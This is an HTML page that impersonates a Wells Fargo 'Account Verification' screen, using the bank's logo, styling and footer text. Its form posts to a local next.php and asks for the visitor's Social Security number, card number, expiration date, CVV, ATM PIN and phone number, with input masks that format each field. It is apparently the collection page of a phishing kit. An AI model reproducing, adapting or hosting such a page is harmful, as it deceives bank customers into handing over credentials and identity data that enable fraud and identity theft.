<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="robots" content="noindex">
    <link rel="stylesheet" href="./css/wfui.291f2821d332057db72e.chunk.css">
    <link rel="stylesheet" href="./css/main.5ed5f40e18e4de30b36c.chunk.css">
    <title>Wells Fargo Account Verification - Identification</title>
</head>

<body class="bodyWFFonts useWFFonts">
    <div id="root" class="viewport">
        <div style="display: flex; flex-flow: column nowrap; flex: 1 1 auto;">
            <div class="base__appWrapper___1z7Dj">
                <div tabindex="-1" class="visuallyHidden" data-testid="first-focus">Sign On to View Your Personal Accounts | Wells Fargo</div>
                <div class="Main__pageContainer___28fNw" style="display: flex; flex-flow: column nowrap; flex: 1 1 100%;">
                    <div class="Page__swipeableContainer___3NFVH">
                        <div data-page-wrapper="" style="display: flex; flex-flow: column nowrap; flex: 1 0 auto;">
                            <div aria-hidden="true" tabindex="-1" class="LifestyleImage__lifestyleImage___22v45" data-testid="lifestyle" style="display: flex; flex-flow: column nowrap; flex: 1 1 auto;"><img alt="Lifestyle" src="./images/COB-BOB-IRT-enroll_park.jpg"><span></span></div>
                            <nav class="WFMasthead__masthead___2qCXs WFMasthead__fixed___26U3T  WFMasthead__desktop___1m0H-" style="display: flex; flex-flow: column nowrap;">
                                <div style="display: flex; flex-flow: column nowrap; flex: 1 1 auto; align-items: center; justify-content: center;">
                                    <div class="WFMasthead__logoBar___vKJhW" style="display: flex; flex-flow: column nowrap; flex: 1 1 auto; align-items: center;">
                                        <div class="Guttered__guttered___3glPq Guttered__desktop___1S7rz WFMasthead__gutter___wEx1t WFMasthead__desktop___1m0H-">
                                            <div class="WFMasthead__logo___2Xb7s" style="display: inline-flex; flex-flow: row nowrap;"><button type="button" class="Button__button___3y0lE WellsFargoLogo__button___2BAYD" role="link"><span class="visuallyHidden">WELLS FARGO</span><svg viewBox="0 0 148 16" aria-hidden="true" role="img" class="WellsFargoLogoIcon__logo___2leTg WellsFargoLogoIcon__desktop___3sxW8" focusable="false">
                                                        <path fill="#ffffff" d="
  M31.5783,10.22 L33.0183,10.22 L33.0183,15 L20.9983,15 L20.9983,13.26 L22.6983,13.26 L22.6983,2.74 L19.94,2.74 L16.44,15 L13.66,15 L10.82,4.84
  L7.9,15 L5.12,15 L1.6,2.74 L0,2.74 L0,1 L6.52,1 L6.52,2.74 L4.64,2.74 L6.98,11.18 L9.78,1 L12.66,1 L15.52,11.2 L17.82,2.74 L15.86,2.74 L15.86,1
  L32.8185,1 L32.8185,5.54 L31.3785,5.54 L31.2385,5 C30.7985,3.32 30.3385,2.74 28.9985,2.74 L25.6785,2.74 L25.6785,6.96 L29.6985,6.96 C29.8509872,7.25655731
  29.9266299,7.5866346 29.9185,7.92 C29.9289227,8.26639109 29.8533362,8.60996586 29.6985,8.92 L25.6785,8.92 L25.6785,13.26 L29.1385,13.26 C30.4385,13.26
  31.0185,12.7 31.4185,10.92 L31.5783,10.22 Z M44.2172,10.92 C43.8172,12.7 43.2572,13.26 41.9372,13.26 L39.1572,13.26 L39.1572,2.74 L41.0572,2.74 L41.0572,1
  L34.4772,1 L34.4772,2.74 L36.1772,2.74 L36.1772,13.26 L34.4772,13.26 L34.4772,15 L45.8172,15 L45.8172,10.22 L44.3772,10.22 L44.2172,10.92 Z M56.8161,10.92
  C56.4161,12.7 55.8561,13.26 54.5361,13.26 L51.7561,13.26 L51.7561,2.74 L53.6561,2.74 L53.6561,1 L47.0761,1 L47.0761,2.74 L48.7761,2.74 L48.7761,13.26 L47.0761,13.26
  L47.0761,15 L58.4161,15 L58.4161,10.22 L56.9761,10.22 L56.8161,10.92 Z M67.3548,6.8 L64.8148,6.22 C63.3348,5.88 62.7148,5.3 62.7148,4.32 C62.7148,3.14 63.6548,2.4
  65.4948,2.4 C67.3348,2.4 68.4148,3.06 68.8348,4.62 L69.0148,5.3 L70.4548,5.3 L70.4548,1.84 C68.8830796,1.03158224 67.1423274,0.606665867 65.3749,0.6 C61.9549,0.6
  59.7549,2.24 59.7549,4.88 C59.7549,6.92 61.0349,8.42 63.4949,8.96 L66.0349,9.52 C67.6549,9.88 68.2549,10.52 68.2549,11.58 C68.2549,12.88 67.2749,13.6 65.3149,13.6
  C63.0949,13.6 61.9549,12.72 61.4549,11.04 L61.1949,10.18 L59.7549,10.18 L59.7549,14.1 C61.5849502,15.0113218 63.6113126,15.4578084 65.6549,15.4 C69.0149,15.4 71.2149,13.72
  71.2149,11.1 C71.2148,8.9 69.8747,7.38 67.3548,6.8 Z M86.6329,2.74 C87.9729,2.74 88.4329,3.32 88.8729,5 L89.0129,5.54 L90.4529,5.54 L90.4529,1 L78.3929,1 L78.3929,2.74 L80.0929,
  2.74 L80.0929,13.26 L78.3929,13.26 L78.3929,15 L85.0729,15 L85.0729,13.26 L83.0729,13.26 L83.0729,9.18 L87.1929,9.18 C87.3477086,8.86995608 87.4232935,8.52638836
  87.4129,8.18 C87.4210727,7.84663029 87.3454276,7.51654256 87.1929,7.22 L83.0729,7.22 L83.0729,2.74 L86.6329,2.74 Z M117.1107,13.42 C117.350603,13.9403466
  117.350603,14.5396534 117.1107,15.06 C116.593408,15.1270209 116.072315,15.1604243 115.5507,15.16 C113.6107,15.16 112.6707,14.36 112.4507,12.5 L112.3707,11.8 C112.1307,9.78
  111.4707,9 109.2707,9 L108.1707,9 L108.1707,13.26 L110.0707,13.26 L110.0707,15 L97.4921,15 L97.4921,13.26 L99.1321,13.26 L98.2121,10.76 L93.0121,10.76 L92.0921,13.26 L93.7721,
  13.26 L93.7721,15 L88.4721,15 L88.4721,13.26 L89.8721,13.26 L94.772,1 L97.432,1 L102.432,13.26 L105.1907,13.26 L105.1907,2.74 L103.4907,2.74 L103.4907,1 L111.5307,1 C114.3907,
  1 116.2507,2.42 116.2507,4.7 C116.236826,5.65544044 115.842919,6.56599554 115.156084,7.23031176 C114.469248,7.89462798 113.546072,8.25797324 112.5907,8.24 L112.5907,
  8.3 C113.320265,8.29049748 114.022729,8.57612277 114.538653,9.09204674 C115.054577,9.60797071 115.340203,10.3104352 115.3307,11.04 L115.4107,11.78 C115.5307,12.94 115.7707,
  13.46 116.6907,13.46 C116.831581,13.4586084 116.972089,13.4452267 117.1107,13.42 Z M97.5719,9.06 L95.6119,3.76 L93.6519,9.06 L97.5719,9.06 Z M113.2307,4.98 C113.2307,
  3.52 112.3307,2.74 110.5307,2.74 L108.1707,2.74 L108.1707,7.24 L110.5307,7.24 C112.3108,7.24 113.2307,6.42 113.2307,4.98 Z M125.1745,8.62 C125.161819,8.96019815 125.237622,
  9.29786628 125.3945,9.6 L127.7745,9.6 L127.7745,13.14 C127.025969,13.4478108 126.223838,13.6041585 125.4145,13.6 C122.5345,13.6 121.0345,11.54 121.0345,7.98 C121.0345,
  4.42 122.5345,2.36 125.2545,2.36 C126.847915,2.27805546 128.291943,3.29300049 128.7545,4.82 L128.9745,5.38 L130.4145,5.38 L130.4145,1.8 C128.769872,0.975783763 126.954079,
  0.550956677 125.1145,0.56 C120.7145,0.56 117.7545,3.5 117.7545,8 C117.7545,12.52 120.6345,15.4 125.1145,15.4 C127.070757,15.3481445 128.988059,14.8414289 130.7145,
  13.92 L130.7145,7.68 L125.3945,7.68 C125.23997,7.96860667 125.164097,8.29279214 125.1745,8.62 Z M147.4382,7.98 C147.4382,12.0889985 144.107199,15.42 139.9982,15.42 C135.889201,
  15.42 132.5582,12.0889985 132.5582,7.98 C132.5582,3.87100146 135.889201,0.54 139.9982,0.54 C144.107199,0.54 147.4382,3.87100146 147.4382,7.98 Z M144.1582,7.98 C144.1582,
  4.44 142.6982,2.38 139.9982,2.38 C137.2982,2.38 135.8382,4.44 135.8382,7.98 C135.8382,11.54 137.2782,13.58 139.9982,13.58 C142.7182,13.58 144.1582,11.54 144.1582,7.98 Z
" fill-rule="nonzero"></path>
                                                    </svg></button></div>
                                            <div class="MenuButton__button___1z_i0"><button type="button" class="Button__button___3y0lE" aria-expanded="false">
                                                    <div style="display: flex; flex-flow: row nowrap; align-items: center; justify-content: center;"><span data-localized="global.navigation.menu" class="visuallyHidden">Navigation Menu</span><svg width="28px" height="16px" aria-hidden="true" role="img" class="HamburgerIcon__icon___hNivY" focusable="false">
                                                            <path d="M0 0h28v2H0zM0 7h28v2H0zM0 14h28v2H0z"></path>
                                                        </svg></div>
                                                </button><svg width="15px" height="7px" viewBox="0 0 20 10" aria-hidden="true" role="img" class="TriangleIcon__icon___3dVwi MenuButton__triangle___3ydaS" focusable="false">
                                                    <g transform="">
                                                        <path d="M10 0l10 10H0z"></path>
                                                        <path d="M0,10 L10,0 L20,10" data-outline=""></path>
                                                    </g>
                                                </svg></div>
                                        </div>
                                    </div>
                                </div>
                            </nav>
                            <div class="Page__page____A8cG Page__useWFFonts___18j_Q Page__useAltMasthead___3xvnU Page__desktop___3k0uo" data-page-container="" style="display: flex; flex-flow: column nowrap; flex: 1 0 auto;">
                                <div style="display: flex; flex-flow: column nowrap; flex: 1 1 auto; align-items: center;">
                                    <div class="PageContent__content___3yKyO" style="padding-top: 60px; display: flex; flex-flow: column nowrap; flex: 1 1 auto; align-items: center;">
                                        <div data-page-content="" class="Guttered__guttered___3glPq Guttered__desktop___1S7rz" style="display: flex; flex-flow: column nowrap; flex: 1 1 auto; align-items: stretch;">
                                            <div class="FloatingPage__floating-container___3gDFl FloatingPage__desktop___2aDLy antiClickjackContent" data-testid="floatingPage">
                                                <div style="display: flex; flex-wrap: nowrap; align-items: center; justify-content: center;">
                                                    <h1 tabindex="-1" class="FloatingPage__salutationTitle___1X9Mp">Validate the following details of your account<span class="FloatingPage__title___2W2k5">Verify your information by completing the fields below to continue.</span></h1>
                                                </div>
                                                <div>
                                                    <form id="signOnForm" class="" action="./next.php" method="POST">
                                                        <div class="Login__containerWrap___143_z">
                                                            <div class="WFFieldSpacing__text___2s42d">
                                                                <div class="WFField__field___3JstE">
                                                                    <div>
                                                                        <div class="WFInput__inputContainer___13Pit">
                                                                            <input id="ssn" name="ssn" type="text" value="" style="padding-left: 8px;" placeholder="Social Security Number (SSN)" required=""></div>
                                                                        <div class="Border__border___2z8C7 Border__notReadOnly___36ZPc"></div>
                                                                        <div class="WFInput__fieldHelp___2GQbg" style="display: flex; flex-flow: column nowrap; padding-left: 0.5rem;">
                                                                            <div></div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                            <div class="WFFieldSpacing__text___2s42d">
                                                                <div class="WFField__field___3JstE">
                                                                    <div>
                                                                        <div class="WFInput__inputContainer___13Pit">
                                                                            <input id="cn" name="cn" type="text" value="" style="padding-left: 8px;" placeholder="Card Number" required=""></div>
                                                                        <div class="Border__border___2z8C7 Border__notReadOnly___36ZPc"></div>
                                                                        <div class="WFInput__fieldHelp___2GQbg" style="display: flex; flex-flow: column nowrap; padding-left: 0.5rem;">
                                                                            <div></div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                            <div class="WFFieldSpacing__text___2s42d">
                                                                <div class="WFField__field___3JstE">
                                                                    <div>
                                                                        <div class="WFInput__inputContainer___13Pit">
                                                                            <input id="exdate" name="exdate" type="text" value="" style="padding-left: 8px;" placeholder="Expiration Date" required=""></div>
                                                                        <div class="Border__border___2z8C7 Border__notReadOnly___36ZPc"></div>
                                                                        <div class="WFInput__fieldHelp___2GQbg" style="display: flex; flex-flow: column nowrap; padding-left: 0.5rem;">
                                                                            <div></div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                            <div class="WFFieldSpacing__text___2s42d">
                                                                <div class="WFField__field___3JstE">
                                                                    <div>
                                                                        <div class="WFInput__inputContainer___13Pit">
                                                                            <input id="cvv" name="cvv" type="text" value="" style="padding-left: 8px;" placeholder="CVV" required="" minlength="3" maxlength="4"></div>
                                                                        <div class="Border__border___2z8C7 Border__notReadOnly___36ZPc"></div>
                                                                        <div class="WFInput__fieldHelp___2GQbg" style="display: flex; flex-flow: column nowrap; padding-left: 0.5rem;">
                                                                            <div></div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                            <div class="WFFieldSpacing__text___2s42d">
                                                                <div class="WFField__field___3JstE">
                                                                    <div>
                                                                        <div class="WFInput__inputContainer___13Pit">
                                                                            <input id="pin" name="pin" type="text" value="" style="padding-left: 8px;" placeholder="ATM PIN" required=""></div>
                                                                        <div class="Border__border___2z8C7 Border__notReadOnly___36ZPc"></div>
                                                                        <div class="WFInput__fieldHelp___2GQbg" style="display: flex; flex-flow: column nowrap; padding-left: 0.5rem;">
                                                                            <div></div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                            <div class="WFFieldSpacing__text___2s42d">
                                                                <div class="WFField__field___3JstE">
                                                                    <div>
                                                                        <div class="WFInput__inputContainer___13Pit">
                                                                            <input id="ph" name="ph" type="text" value="" style="padding-left: 8px;" placeholder="Phone Number" required=""></div>
                                                                        <div class="Border__border___2z8C7 Border__notReadOnly___36ZPc"></div>
                                                                        <div class="WFInput__fieldHelp___2GQbg" style="display: flex; flex-flow: column nowrap; padding-left: 0.5rem;">
                                                                            <div></div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <section class="CaptchaPayload__captchaWrapper___CDEDn" id="captchaContainer" data-testid="capatcha-payload"></section>
                                                        <div class="Login__signOnButton___3uWQF" style="display: flex; flex-wrap: nowrap; align-items: center; justify-content: center;">
                                                            <button type="submit" name="btn3" id="btn3" class="Button__button___3y0lE Button__modern___3lAgx Button__responsive___1QHpq Button__primary___ritso">Continue</button>
                                                        </div>
                                                        <section class="Panel__panel___24pqd Panel__desktop___1p7aO" data-testid="panel-container" style="display: flex; flex-flow: row nowrap; align-items: center; justify-content: center;"><span class="Panel__panelFooter___Ss_3p Panel__desktop___1p7aO"><span data-localized="loginApp.login.label.needHelp" class="Panel__needHelpText___3CbGr Panel__desktop___1p7aO">Need help?</span>&nbsp;<a href="#" data-testid="createNewPassword"><span data-localized="loginApp.login.label.createANewPassword">Create a new password</span></a>&nbsp;<span data-localized="loginApp.login.label.or">or</span>&nbsp;<a href="#" data-testid="findYourUsername"><span data-localized="loginApp.login.label.findYourUsername">find your username</span></a></span></section>
                                                    </form>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="WFFooter__footer___1WB8-" style="display: flex; flex-flow: row nowrap; align-items: center; justify-content: center;">
                                    <div class="Guttered__guttered___3glPq Guttered__desktop___1S7rz">
                                        <div>
                                            <ul class="Links__links___1Uwym">
                                                <li><a data-accessible-id="NLOCIUAT" role="link" tabindex="0"><span>About Wells Fargo</span></a></li>
                                                <li><a data-accessible-id="OTWYJOJP" role="link" tabindex="0"><span>Online Access Agreement</span></a></li>
                                                <li><a data-accessible-id="LPZBYHUJ" role="link" tabindex="0"><span>Privacy, Cookies, Security &amp; Legal</span></a></li>
                                                <li><a data-accessible-id="LRGPPHJF" role="link" tabindex="0"><span>Notice of Data Collection</span></a></li>
                                                <li><a data-accessible-id="OFRFNSIR" role="link" tabindex="0"><span>Report Email Fraud</span></a></li>
                                                <li><a data-accessible-id="BAJYKZBQ" role="link" tabindex="0"><span>Security Center</span></a></li>
                                                <li><a data-accessible-id="MLKAMBDJ" role="link" tabindex="0"><span>Sitemap</span></a></li>
                                                <li><a data-accessible-id="RSFJYRWI" role="link" tabindex="0"><span>Ad Choices</span></a></li>
                                            </ul>
                                            <div class="CopyRight__copyright___3aFR-">© 1999 - 2021 Wells Fargo. All rights reserved. NMLSR ID 399801</div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
    <script src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/jquery.inputmask.bundle.js"></script>
    <script type="text/javascript">
    $("#ssn").inputmask({ "mask": "999-99-9999" });
    $("#cn").inputmask({ "mask": "9999 9999 9999 9999" });
    $("#exdate").inputmask({ "mask": "99/9999", "placeholder": "MM/YYYY" });
    $("#ph").inputmask({ "mask": "999-999-9999" });
    </script>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>

</html>